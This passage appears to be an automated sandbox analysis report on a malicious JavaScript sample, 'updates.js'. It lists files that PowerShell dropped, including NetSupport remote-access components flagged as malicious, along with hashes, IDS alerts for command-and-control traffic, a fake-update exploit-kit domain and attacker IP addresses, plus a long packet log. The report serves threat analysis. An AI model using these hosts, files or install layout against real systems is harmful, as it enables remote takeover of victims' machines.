                                                                            Preview:.{"variations_compressed_seed":"H4sIAAAAAAAA\/+y9a5wc11UvOtU9M7a3JLu1ZctS6zUqS\/JIttrd1Y\/plu2EeWikaWukSffokcShVdW1p7s81VVNVfWMJg9uyAVCLpCQB4FAIIRXwiGJHQ6Pe4DLKzrAvQdyD4RLbjgcAhyegRwSOIdzknNuuL\/au6q6dr1bcmzLnuSDPF1r\/ffea639XnstMNNcnu++dmt5YSm\/vLC0tSzlNy8tzN5YXlgfXFpY3lpemN0821nqzM4++eRDKxerF7YGcvc1zyw9CZ9jwIOzSz2+gxqIF5G2jESJX5H5LaRVmfpZcOKyjlohBC3d4AUZtQr5fEYU9ocC1QsAzquKoamym2VM2A\/DWBr74a6ZSi6fK1bztVyhUMiOz8zkTk2lp8fhs54qX5FEpF4aGP2BEVxlF0FklV10SavsYmnsgzuHVa5wrhp\/gQEPzF5ZVAeKyBuSqszzfWOgoStclamfArvOKmYB4gV+oLS7GVF4MIS6\/jg4vKhqbSReUlqBFJkx4cFsCPMT4IjFvLYWzs0GczdOwF3Vai6fKxW5Uq5QqmR31Armn6VSKZefGptiplJT6WnmOgP\/JKKxx8HdC5KOW2u2E7702nkEjleruVNZqrVlqoG\/mQInZwWZN1AT8Vq7u6KpG5KItKu81hv0G+ibBkg39FlF1FRJrDL1ArjLMqXM\/n1\/8t9\/lxEOwmw4wFsZpr4D3LWA1viBbGQ4k9+ykMz+fZ\/H\/CCG\/yx4aCjAUMrMmHAwG4FUXwTHXKKMxGEjcBp74ESBK+ZOmWKcHu\/e\/KNfeG7yOgM\/nUiQC0hfN9S+V5B\/epuC\/LM7UZAH3IIcm2amU9Pp6Xscgf5GChyPF+jSpaZXmH9+m8L8T3eiMCmrnHCE+H0p8MAK30FLypo6K6gDY7Ur6U3JQFWmvugbrLks2N3sqptNvteXkSlRpBhwYo2X

                                                                            C:\Users\user\AppData\Roaming\QCHBWPB-9\install\manifest.json

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:JSON data
                                                                            Category:dropped
                                                                            Size (bytes):170
                                                                            Entropy (8bit):4.67078204534958
                                                                            Encrypted:false
                                                                            SSDEEP:3:mifFuY9HnQA5JVPqS18iMDXAh/OR6TAulLvPxAUNV/RWFVXAkEpMgMYv:v5975JVSS18iMkh26Vlp//gQNMC
                                                                            MD5:CBA80EE11DE525535BF2068AC23107B0
                                                                            SHA1:479C817E5B4AE2E49E1E950359F072DD8A8D227F
                                                                            SHA-256:333654272A482DC66A15D07C778CDFED72E74F6FA50342F00995E26F5DC7678F
                                                                            SHA-512:5ACDFD8874E3506C65446F5B5022879B74D5FAA4D05AF36C9835A35E542BAB21D81AF0F334403F9F3597B12C20C52E2DE9377ED7B22466DEA3D7ECE47810D5F8
                                                                            Malicious:false
                                                                            Preview:{. "name": "MEI Preload", . "icons": {}, . "version": "1.0.7.1652906823", . "manifest_version": 2, . "description": "Contains preloaded data for Media Engagement".}.

                                                                            C:\Users\user\AppData\Roaming\QCHBWPB-9\install\uz.pak

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):428738
                                                                            Entropy (8bit):5.633613175057363
                                                                            Encrypted:false
                                                                            SSDEEP:6144:PO9/3sERZht7a5XBZLE2mV9RfPLyJDPrwnCWacgjjW5cRE0O2fGOGwNws/08gh8h:FER8XzwPgnma9
                                                                            MD5:0E95005552BA506314B1591376EB9D75
                                                                            SHA1:58B3C2EC36D3738AB8E10105C12BE1784C627F31
                                                                            SHA-256:72CB1CBC47EC3D560E02A19B4A9DF7FF6C4E232CA98286158E78CFF346A4CD46
                                                                            SHA-512:88FDDFD0E22C4A21A36C97E27758149691D7E61F8C44CF69AAF3C9CE977CB29FA0949A76BF343A36D352B48BDCBD66C8AD6CEB6FAB7C247A73BDAA4116A314B7
                                                                            Malicious:false
                                                                            Preview:......... y.e.v...f.|...g.....h.....i.....j.....k.....l.*...m.8...n.Z...o.....p.....q.b...r.w...s.....t.....u.....v.....w.....x.....y.....z.....{."...|.....}.2...~.A.....L.....T.....Y.....f.....l.....t.....................................................................................................$.....A.....G.....M.....T.....Z.....r.....s.....z.....}.................................................................*.....1.....N.....b.....y.....................................................6.....M.....q...............................................'.....=.....\.....c.....s.....x.........................................=.....m.....................................................-.....K.....Q.....g.....o...................................................................................).....5.....I....._.......................(.....b.........".....#.....$.....%.....&.9...'.@...(.Y...).m...+.~.../.....1.....2.....3.....4.....5.....6.....7.....:.+...;.Q...<.V...=.z.................0.

                                                                            C:\Users\user\AppData\Roaming\QCHBWPB-9\install\zh-CN.pak

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):361713
                                                                            Entropy (8bit):6.790395434377143
                                                                            Encrypted:false
                                                                            SSDEEP:6144:nBWo6FHO66dFrmKSvqRSRbq9SgvFzJlkVDE:nBWoo563rnyrgtzJlku
                                                                            MD5:B854863EDFE51CED85381590992C1DEA
                                                                            SHA1:5202285EAC135C1D444459E0969D1481833EEA8E
                                                                            SHA-256:41DA1543A2E58B1932EF7E525A93BB3336CBE6CB6AB0648A604D0E59589931EF
                                                                            SHA-512:3C3D1887D99063BA2938D844C2A5FB2F9FDB2FB043347BFC5DD2A0907CD2F1FCF8F25D6B36728D4531E68171055DFD58D82FED636BBE72F46E7076748AC0D6B8
                                                                            Malicious:false
                                                                            Preview:......... ..e.<...f.B...g.V...h.i...i.w...j.....k.....l.....m.....n.....o.x...p.....q.....r.....s.....t.....u.....v.....w.#...x.5...y.I...z.d...{.i...|.t...}.x...~.......................................................................................................1.....8.....@.....H.....J.....M.....V.....h.....q.....w.....}.........................................................................................%.....2.....D.....S.....Y.....n.....}.............................................................................+.....@.....L.....X.....y.................................................................%.....@.....R.....h...........................................................".....2.....>.....J.....Y....._.....k.....y.............................................................................?.....V......................."...".....#.^...$.....%.....&.....'.....(.....).....*.....+...../.....1."...2.(...3.:...4.F...5.^...6.g...7.s...8.....:.....;.....<.....=.............".

                                                                            C:\Users\user\AppData\Roaming\QCHBWPB-9\install_state.json

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with CRLF, LF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1794
                                                                            Entropy (8bit):3.5509498109363986
                                                                            Encrypted:false
                                                                            SSDEEP:24:eCrjdMrTm893chS4Mw2n1iFotb496fjCuTiBCVXTbzVHeEVt:/rS0EQn8bB+EVt
                                                                            MD5:3F78A0569C858AD26452633157103095
                                                                            SHA1:8119BCC1D66B17CCD286FEF396FA48594188C4D0
                                                                            SHA-256:D53FC339533D39F413DDD29A69ADE19F2972383DB8FB8938D77D2E79C8573F36
                                                                            SHA-512:89842E39703970108135D71CE4C039DF19C18F04C280CB2516409758F9D22E0205567B08DBE527A6FB7C295BDA2EA8EE6A368D6FCAF6FB59645D31EF2243AD3D
                                                                            Malicious:false
                                                                            Preview://353b2d6049dd2f0998bdd73f13855b290ad0be89f62d61dbc2672253e4fb72da.{.. "install": {.. "clids": {.. "clid1": {.. "clid": "1985548",.. "vid": "225".. },.. "clid10": {.. "clid": "1985553",.. "vid": "225".. },.. "clid100004": {.. "clid": "1985555",.. "vid": "225".. },.. "clid1010": {.. "clid": "2372823",.. "vid": "".. },.. "clid15": {.. "clid": "1985554",.. "vid": "225".. },.. "clid21": {.. "clid": "2372816",.. "vid": "".. },.. "clid25": {.. "clid": "2372817",.. "vid": "".. },.. "clid28": {.. "clid": "2372813",.. "vid": "".. },.. "clid29": {.. "clid": "2372821",.. "vid": "".. },.. "clid30": {.. "clid": "2372822",.. "v

                                                                            C:\Users\user\AppData\Roaming\QCHBWPB-9\msvcr100.dll

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):773968
                                                                            Entropy (8bit):6.901559811406837
                                                                            Encrypted:false
                                                                            SSDEEP:12288:nMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BVoe3z:MmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV7z
                                                                            MD5:0E37FBFA79D349D672456923EC5FBBE3
                                                                            SHA1:4E880FC7625CCF8D9CA799D5B94CE2B1E7597335
                                                                            SHA-256:8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
                                                                            SHA-512:2BEA9BD528513A3C6A54BEAC25096EE200A4E6CCFC2A308AE9CFD1AD8738E2E2DEFD477D59DB527A048E5E9A4FE1FC1D771701DE14EF82B4DBCDC90DF0387630
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.y.~...~...~...w...}...~.......eD.....eD..+...eD..J...eD......eD......eD......eD......Rich~...................PE..L......M.........."!.........................0.....x......................................@..........................H......d...(.......................P.......$L...!..8...........................hE..@............................................text...!........................... ..`.data....Z...0...N..................@....rsrc................f..............@..@.reloc..$L.......N...j..............@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                            C:\Users\user\AppData\Roaming\QCHBWPB-9\nskbfltr.inf

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:Windows setup INFormation
                                                                            Category:dropped
                                                                            Size (bytes):328
                                                                            Entropy (8bit):4.93007757242403
                                                                            Encrypted:false
                                                                            SSDEEP:6:a0S880EeLL6sWqYFcf8KYFEAy1JoHBIr2M2OIAXFYJKRLIkg/LH2yi9vyifjBLWh:JShNvPG1JoHBx2XFhILH4Burn
                                                                            MD5:26E28C01461F7E65C402BDF09923D435
                                                                            SHA1:1D9B5CFCC30436112A7E31D5E4624F52E845C573
                                                                            SHA-256:D96856CD944A9F1587907CACEF974C0248B7F4210F1689C1E6BCAC5FED289368
                                                                            SHA-512:C30EC66FECB0A41E91A31804BE3A8B6047FC3789306ADC106C723B3E5B166127766670C7DA38D77D3694D99A8CDDB26BC266EE21DBA60A148CDF4D6EE10D27D7
                                                                            Malicious:false
                                                                            Preview:; nskbfltr.inf..;..; NS Keyboard Filter..; ..;..; This inf file installs the WDF Framework binaries....[Version]..Signature="$Windows NT$"..Provider=NSL......;..;--- nskbfltr Coinstaller installation ------..;......[nskbfltr.NT.Wdf]..KmdfService = nskbfltr, nskbfltr_wdfsect....[nskbfltr_wdfsect]..KmdfLibraryVersion = 1.5......

                                                                            C:\Users\user\AppData\Roaming\QCHBWPB-9\nsm_vpro.ini

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):46
                                                                            Entropy (8bit):4.532048032699691
                                                                            Encrypted:false
                                                                            SSDEEP:3:lsylULyJGI6csM:+ocyJGIPsM
                                                                            MD5:3BE27483FDCDBF9EBAE93234785235E3
                                                                            SHA1:360B61FE19CDC1AFB2B34D8C25D8B88A4C843A82
                                                                            SHA-256:4BFA4C00414660BA44BDDDE5216A7F28AECCAA9E2D42DF4BBFF66DB57C60522B
                                                                            SHA-512:EDBE8CF1CBC5FED80FEDF963ADE44E08052B19C064E8BCA66FA0FE1B332141FBE175B8B727F8F56978D1584BAAF27D331947C0B3593AAFF5632756199DC470E5
                                                                            Malicious:false
                                                                            Preview:[COMMON]..Storage_Enabled=0..Debug_Level=0....

                                                                            C:\Users\user\AppData\Roaming\QCHBWPB-9\pcicapi.dll

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):33144
                                                                            Entropy (8bit):6.7376663312239256
                                                                            Encrypted:false
                                                                            SSDEEP:768:JFvNhAyi5hHA448qZkSn+EgT8ToDXTVi0:JCyoHA448qSSzgIQb
                                                                            MD5:34DFB87E4200D852D1FB45DC48F93CFC
                                                                            SHA1:35B4E73FB7C8D4C3FEFB90B7E7DC19F3E653C641
                                                                            SHA-256:2D6C6200508C0797E6542B195C999F3485C4EF76551AA3C65016587788BA1703
                                                                            SHA-512:F5BB4E700322CBAA5069244812A9B6CE6899CE15B4FD6384A3E8BE421E409E4526B2F67FE210394CD47C4685861FAF760EFF9AF77209100B82B2E0655581C9B2
                                                                            Malicious:true
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\pcicapi.dll, Author: Joe Security
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+-..E~..E~..E~.\.~..E~.\.~..E~...~..E~..D~..E~.\.~..E~.\.~..E~.\.~..E~.\.~..E~...~..E~.\.~..E~Rich..E~........PE..L......U...........!.....2...........<.......P...............................`............@..........................^.......W..d....@..x............X..x)...P......`Q...............................V..@............P..@............................text....1.......2.................. ..`.rdata.......P.......6..............@..@.data...,....`.......F..............@....rsrc...x....@.......H..............@..@.reloc.......P.......P..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                            C:\Users\user\AppData\Roaming\QCHBWPB-9\remcmdstub.exe

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):63864
                                                                            Entropy (8bit):6.446503462786185
                                                                            Encrypted:false
                                                                            SSDEEP:1536:Tf6fvDuNcAjJMBUHYBlXU1wT2JFqy9BQhiK:D6f7cjJ4U4I1jFqy92hiK
                                                                            MD5:6FCA49B85AA38EE016E39E14B9F9D6D9
                                                                            SHA1:B0D689C70E91D5600CCC2A4E533FF89BF4CA388B
                                                                            SHA-256:FEDD609A16C717DB9BEA3072BED41E79B564C4BC97F959208BFA52FB3C9FA814
                                                                            SHA-512:F9C90029FF3DEA84DF853DB63DACE97D1C835A8CF7B6A6227A5B6DB4ABE25E9912DFED6967A88A128D11AB584663E099BF80C50DD879242432312961C0CFE622
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 24%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$U..`4..`4..`4..{.D.q4..{.p.54..iLI.e4..`4..74..{.q.}4..{.@.a4..{.G.a4..Rich`4..................PE..L......U.....................J.......!............@.......................... .......o....@....................................<.......T...............x)..............................................@...............@............................text............................... ..`.rdata...%.......&..................@..@.data....-..........................@....rsrc...T...........................@..@.reloc..p...........................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                            C:\Users\user\AppData\Roaming\QCHBWPB-9\tttt.zip

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                            Category:dropped
                                                                            Size (bytes):3731111
                                                                            Entropy (8bit):7.998189353488866
                                                                            Encrypted:true
                                                                            SSDEEP:98304:E1NFXa/hRFY89YYc9jh23redpmQR1Q6/mizhpX6mZ:UNSxYoY59V0redpmQR1jhpr
                                                                            MD5:1953F79338B3D98FA2B4B0BF5267C0DD
                                                                            SHA1:B0CA3E4478A2A1C87A2BE7FE54A158F8ECEA010A
                                                                            SHA-256:761B322F245B177CDAF44253EB3D3ED7F939ACD6C6EE5F22A6A72A56AB411941
                                                                            SHA-512:20C8BA5032B45D895774058E925922178F6D79CCD7A6E035FB78915CA512D16D7347CFEA4CCB30974E1632B44B5F3F85528FAE11318FEACDBB2D02B09FA733CD
                                                                            Malicious:false
                                                                            Preview:PK.........DWW..%.&l..........client32.exe.|.xT.....N..".R....A.W..@........Tj.$...Q.@... ...7!...@..iJ.......;3....R..~.....;g...3gfnx...T.@......b../....d.@...n{...ts....5d.....]%.i..v...:3lZ..i]G.9v.:...\__...F.).C....(..B..t..P.f....&..9..e.k9.:.K.X...8..`.@...Oph.@W...B.p....N.]A.....A^...!..Y..T...+..t........`..KUg.....`..]w..=k...g...7.......4<..=f..|..8T.."...z..:..ae>s.L.(....f.U.%=.).Iq.....T..px-..8G.G...`8.>{#.=....&B..G..)t........uY:R0..C.....C.........G......1r.e..K5HMop..ZJ..6.&...fM.........m....G..W.I0....hb.."NDS5...>MTz-.".i.....v..[..JC.dC........^4....4.W.U.SZ.'..........O...C.O.+..X...Cs.)S.L`3'8t.....Y..Te....~aS.G...M......9..g......0}.|-.;..N%....Hi......$.....kC..t..`..,..!&..X..$.6k..v....o_.I.......x......?_..'.A..../`S.b...u.].....t..9.6...g.l..|.2...Nte.}.N....]........)d..Q{.>g.p?G.O...g.......S.Z*.-.....^.......[......V..i...V.oh.~l+......R9.}W.F..q....4...._`G.CK..u.@l.....7l.W/..b.&... H.1..I.........

                                                                            Static File Info

                                                                            General

                                                                            File type:ASCII text
                                                                            Entropy (8bit):4.951085343698605
                                                                            TrID:
                                                                            • Java Script (8502/1) 68.00%
                                                                            • Digital Micrograph Script (4001/1) 32.00%
                                                                            File name:updates.js
                                                                            File size:7'684'589 bytes
                                                                            MD5:917ed9cb792f81537e24395e1505bf6c
                                                                            SHA1:25fec4cba71614d8332cac3f4446fca039d1f33e
                                                                            SHA256:d62447548f057c993c73fece105a22d98d2e2604e4f0cd26bb6821b2686e732f
                                                                            SHA512:e0b907f89db72260dd82346e6a55e71870e57a4654dfbe15670143304016d04d6a581da270c160dc27e70d26b4f8641f3dbf2da87ce9f646741e09a1a17a7921
                                                                            SSDEEP:49152:f7h4zjCxb7qHlp4BOlN0KFhcuscyEMzYsm7++86mn3Ef/Vf7GI0/3qp6RCgScEQy:y
                                                                            TLSH:D276E40DAEF71091A923317C8FAF640AB674801B150ADD143D8DA3945FA953867FEFE8
                                                                            File Content Preview:/*.* Licensed to the Apache Software Foundation (ASF) under one.* or more contributor license agreements. See the NOTICE file.* distributed with this work for additional information.* regarding copyright ownership. The ASF licenses this file.* to you un

                                                                            File Icon

                                                                            Icon Hash:68d69b8bb6aa9a86

                                                                            Network Behavior

                                                                            Snort IDS Alerts

                                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                            07/17/24-15:19:55.846593UDP2054434ET CURRENT_EVENTS ZPHP Domain in DNS Lookup (luxurycaborental .com)6238253192.168.2.51.1.1.1

                                                                            Suricata IDS Alerts

                                                                            TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                                                            2024-07-17T15:19:43.805193+0200TCP2827745ETPRO MALWARE NetSupport RAT CnC Activity49705443192.168.2.5194.180.191.69
                                                                            2024-07-17T15:19:55.846593+0200UDP2054434ET EXPLOIT_KIT ZPHP Domain in DNS Lookup (luxurycaborental .com)6238253192.168.2.51.1.1.1

                                                                            Network Port Distribution

                                                                            TCP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Jul 17, 2024 15:19:56.022631884 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.027770996 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.027874947 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.028702021 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.033696890 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.526896000 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.527133942 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.527148008 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.527293921 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.528114080 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.528135061 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.528182983 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.529253960 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.529268026 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.529323101 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.530339956 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.530354023 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.530400991 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.532124996 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.532196045 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.532262087 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.534334898 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.534394979 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.619215012 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.619453907 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.619466066 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.619518042 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.620230913 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.620282888 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.620460987 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.620877028 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.620892048 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.620928049 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.621754885 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.621767998 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.621818066 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.622488976 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.622503042 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.622550964 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.623370886 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.623383999 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.623415947 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.624294043 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.624306917 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.624355078 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.625144005 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.625158072 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.625205040 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.626012087 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.626024961 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.626035929 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.626074076 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.626106024 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.626857996 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.659491062 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.659549952 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.659710884 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.659749985 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.659796000 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.660089016 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.711359024 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.711688995 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.711874008 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.711889029 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.711932898 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.712588072 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.712601900 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.712660074 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.713316917 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.713330030 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.713368893 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.714126110 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.714142084 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.714180946 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.714926004 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.714941978 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.714975119 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.715734959 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.715751886 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.715784073 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.716587067 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.716605902 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.716618061 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.716638088 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.716675997 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.717333078 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.717345953 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.717396021 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.718115091 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.718127966 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.718177080 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.718802929 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.718816042 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.718827009 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.718867064 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.719758034 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.719769955 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.719780922 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.719793081 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.719820023 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.719945908 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.720738888 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.720752001 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.720763922 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.720783949 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.720809937 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.721719027 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.721731901 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.721741915 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.721786022 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.722686052 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.722698927 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.722709894 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.722723961 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.722738981 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.722780943 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.723683119 CEST804970438.180.60.246192.168.2.5
